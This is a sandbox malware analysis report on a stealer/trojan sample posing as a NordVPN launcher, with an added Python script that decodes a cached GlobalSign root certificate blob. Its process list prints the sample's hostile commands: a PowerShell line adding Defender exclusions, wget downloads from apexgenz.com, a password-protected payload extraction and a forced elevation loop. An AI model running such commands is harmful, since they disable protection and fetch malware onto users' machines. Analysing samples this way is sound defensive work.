Malware Analysis Report

2024-11-30 02:15

Sample ID 240329-r9vtpsah3s
Target Launcher.exe
SHA256 fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03
Tags
amadey rhadamanthys stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

Threat Level: Known bad

The file Launcher.exe was found to be: Known bad.

Malicious Activity Summary

amadey rhadamanthys stealer trojan

Amadey

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Legitimate hosting services abused for malware hosting/C2

Checks computer location settings

Executes dropped EXE

Enumerates physical storage devices

Program crash

NTFS ADS

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-29 14:54

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-29 14:54

Reported

2024-03-29 15:01

Platform

win10v2004-20240226-en

Max time kernel

233s

Max time network

275s

Command Line

sihost.exe

Signatures

Amadey

trojan amadey

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 3700 created 2768 | N/A | C:\Users\Admin\AppData\Roaming\services\plugin16904 | C:\Windows\system32\sihost.exe

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A
N/A | bitbucket.org | N/A | N/A
N/A | bitbucket.org | N/A | N/A
N/A | bitbucket.org | N/A | N/A
N/A | bitbucket.org | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A

Enumerates physical storage devices

Checks processor information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A

Modifies system certificate store

evasion spyware trojan
Description | Indicator | Process | Target
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = [blob value elided] | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = [blob value elided] | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A
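
Sandbox engines raise "Modifies system certificate store" on any write under SystemCertificates, so this signature deserves a second look before it is treated as a rogue root. The key path ends in thumbprint D69B561148F01C77C54578C10926DF5B856976AD, which is GlobalSign Root CA - R3, a root in the Microsoft trusted root program, and the friendly-name property inside the blob says the same. A write of this shape under AuthRoot\Certificates is CryptoAPI's automatic root update caching a root it needed to build a chain (here for the sample's own HTTPS traffic), which is why the Process column shows Launcher.exe; a root an attacker adds with certutil -addstore or CertAddCertificateContextToStore typically lands under ROOT\Certificates instead. The check a practitioner wants is therefore: what certificate does the blob actually carry, and do its stored hashes belong to it? The script below is an added example, not part of the sandbox report or any vendor tooling. It decodes the second Blob value from the table above (split here at record boundaries) using the serialized property layout CryptoAPI uses for these values: each record is a 32-bit property ID, a 32-bit reserved field equal to 1, a 32-bit length, then the data; the property-ID constants are those of wincrypt.h.

```python
import hashlib
import struct
from typing import Dict, List

# Property IDs from wincrypt.h needed to identify a cached certificate.
CERT_SHA1_HASH_PROP_ID = 3
CERT_FRIENDLY_NAME_PROP_ID = 11
CERT_CERT_PROP_ID = 32

# The second Blob value written under AuthRoot\Certificates\D69B5611... above,
# split at record boundaries. Layout (assumed, per CryptoAPI serialized
# properties): propid u32 LE | reserved = 1 u32 LE | length u32 LE | data.
BLOB_HEX = (
    "190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f"
    "0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab"
    "090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a0304"
    "06082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308"
    "530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0"
    "301b060567810c010330123010060a2b0601040182373c0101030200c0"
    "0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000"
    "620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b"
    "1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc"
    "1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953"
    "030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad"  # CERT_SHA1_HASH_PROP_ID
    "040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028"          # CERT_MD5_HASH_PROP_ID
    "200000000100000063030000"  # CERT_CERT_PROP_ID: 0x363 = 867 bytes of DER follow
    "3082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500"
    "304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e"
    "301e170d3039303331383130303030305a170d3239303331383130303030305a"
    "304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e"
    "30820122300d06092a864886f70d01010105000382010f003082010a0282010100"
    "cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a"
    "9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae"
    "97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06"
    "d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cb"
    "c82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8"
    "822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb9049268"
    "68e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77"
    "b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c669858217"
    "0203010001"
    "a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc"
    "300d06092a864886f70d01010b0500"
    "0382010100"
    "4b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674"
    "b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e3339"
    "45c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf35"
    "21c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418f"
    "ed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f"
    "7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc34151"
    "13239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baee"
    "db556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f"
)


def parse_cert_blob(blob: bytes) -> Dict[int, bytes]:
    """Walk the property records of a SystemCertificates ...\\Blob value."""
    props: Dict[int, bytes] = {}
    off = 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f"truncated record header at offset {off}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        if reserved != 1:
            raise ValueError(f"unexpected reserved value {reserved} at offset {off}")
        off += 12
        if off + length > len(blob):
            raise ValueError(f"record {prop_id} runs past the end of the blob")
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def identify(blob_hex: str) -> Dict[str, object]:
    """What an analyst needs before escalating: which certificate this is, and
    whether the stored thumbprint really belongs to the embedded DER."""
    props = parse_cert_blob(bytes.fromhex(blob_hex))
    der = props[CERT_CERT_PROP_ID]
    stored_sha1 = props[CERT_SHA1_HASH_PROP_ID].hex()
    ids: List[int] = sorted(props)
    return {
        "friendly_name": props[CERT_FRIENDLY_NAME_PROP_ID].decode("utf-16-le").rstrip("\x00"),
        "thumbprint": stored_sha1,
        "der_length": len(der),
        "sha1_matches": hashlib.sha1(der).hexdigest() == stored_sha1,
        "property_ids": ids,
    }


if __name__ == "__main__":
    for key, value in identify(BLOB_HEX).items():
        print(f"{key}: {value}")
```

The friendly name and thumbprint settle the question for this sample; the SHA-1 check matters for the opposite case, where a blob carries a stored thumbprint that does not match its DER, which is the shape of a hand-crafted registry write rather than a CryptoAPI cache entry.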

NTFS ADS

Description | Indicator | Process | Target
File created | C:\Users\Admin\Downloads\NordVPN-10_11.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: 35 (left unnamed by the sandbox; privilege LUID 35 is SeCreateSymbolicLinkPrivilege) | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: 35 (left unnamed by the sandbox; privilege LUID 35 is SeCreateSymbolicLinkPrivilege) | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Identical rows
PID 820 wrote to memory of 1220 | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Program Files\Mozilla Firefox\firefox.exe | 11
PID 1220 wrote to memory of 1764 | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Program Files\Mozilla Firefox\firefox.exe | 2
PID 1220 wrote to memory of 2892 | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Program Files\Mozilla Firefox\firefox.exe | 48
PID 1220 wrote to memory of 2068 | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Program Files\Mozilla Firefox\firefox.exe | 3

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.0.1356778034\781898511" -parentBuildID 20221007134813 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bac3c253-492e-4754-8824-332a5a2ce8c1} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 1980 1450b8f6a58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.1.824453598\2145723619" -parentBuildID 20221007134813 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {acaa10f2-4a25-4541-ba6c-256fe5ca92f9} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2380 1450b7f5458 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.2.353070175\1465853438" -childID 1 -isForBrowser -prefsHandle 3404 -prefMapHandle 3400 -prefsLen 20823 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {438e99c7-e7df-4dcd-88d1-7e7cf4d178fd} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 3120 1450f9bdc58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.3.1668280839\1170008933" -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 3572 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec4c2570-f71b-4ea2-86f9-0942de763845} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 3588 1450e3ad558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.4.1512091846\1798937739" -childID 3 -isForBrowser -prefsHandle 4544 -prefMapHandle 4540 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e44030b0-6a2d-4728-a678-f6897fe0e0cc} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 4552 145115a2f58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.5.1946169069\286040142" -childID 4 -isForBrowser -prefsHandle 5000 -prefMapHandle 4996 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48b1b25d-d050-42b7-9d6c-a24b299f21bc} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5008 14511f09c58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.6.500169602\1990768902" -childID 5 -isForBrowser -prefsHandle 4936 -prefMapHandle 4932 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e902716-9475-45c0-996a-fa79f2f68a0a} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5032 14511f0c258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.7.1205998962\1432607393" -childID 6 -isForBrowser -prefsHandle 5288 -prefMapHandle 5164 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e73a16d0-cffd-455e-a9e9-294ea1e798fb} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5276 14511f0d758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.8.559184309\1915907281" -childID 7 -isForBrowser -prefsHandle 5848 -prefMapHandle 5844 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5967c015-3b37-48fe-831f-3d6948a42493} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5860 145139ab558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.9.1771782841\217158023" -childID 8 -isForBrowser -prefsHandle 5056 -prefMapHandle 5108 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {829adee5-4281-4ef9-a610-03061e01936e} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5048 14512447b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.10.1618326309\413425509" -parentBuildID 20221007134813 -prefsHandle 4844 -prefMapHandle 4272 -prefsLen 26725 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a284c35b-bbc6-45d5-89c3-7d15b45bcfbb} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2796 1450e05da58 rdd

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.11.318254061\19738600" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 3236 -prefMapHandle 3164 -prefsLen 26725 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4fbb6aa6-4d30-414c-b886-0b96befe9b38} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2864 1450f2f7558 utility

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\NordVPN-10_11\" -spe -an -ai#7zMap27144:88:7zEvent917

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\plugin16904

C:\Users\Admin\AppData\Roaming\services\plugin16904

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3700 -ip 3700

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 628

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap6622:88:7zEvent8870

C:\Users\Admin\AppData\Roaming\services\winrar.exe

